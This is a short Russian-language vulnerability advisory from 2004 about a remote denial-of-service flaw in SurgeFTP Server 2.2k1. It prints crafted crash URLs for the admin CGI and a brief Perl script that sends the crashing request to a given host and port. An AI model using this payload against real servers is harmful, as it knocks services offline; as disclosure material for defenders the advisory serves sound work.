DoS против SurgeFTP Server

Дата публикации:
04.02.2004
Всего просмотров:
932
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: SurgeFTP Server 2.2k1

Описание: Уязвимость обнаружена в SurgeFTP Server. Удаленный пользователь может аварийно завершить работу FTP сервера.

Пример:

http://[server]:7021/cgi/surgeftpmgr.cgi?cmd=%%

http://[server]/cgi/?r34ct=%di e%

Пример/Эксплоит:

----------$r34ct-rainbow.pl ------
#!/usr/bin/perl
use IO::Socket;
printf "SurgeFtp 2.2k1\n\n";
if(@ARGV < 2) { die "\nUsage: host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];

$sock =new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => "TCP");

print $sock "GET /cgi/surgeftpmgr.cgi?cmd=%% http/1.0\n\n";
while (<$sock>){print}

close ($sock);

print("\n\n");
exit;

---end-----

URL производителя: http://netwinsite.com/surgeftp/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: SurgeFTP 2.2k1 Remote administration console crash

или введите имя

CAPTCHA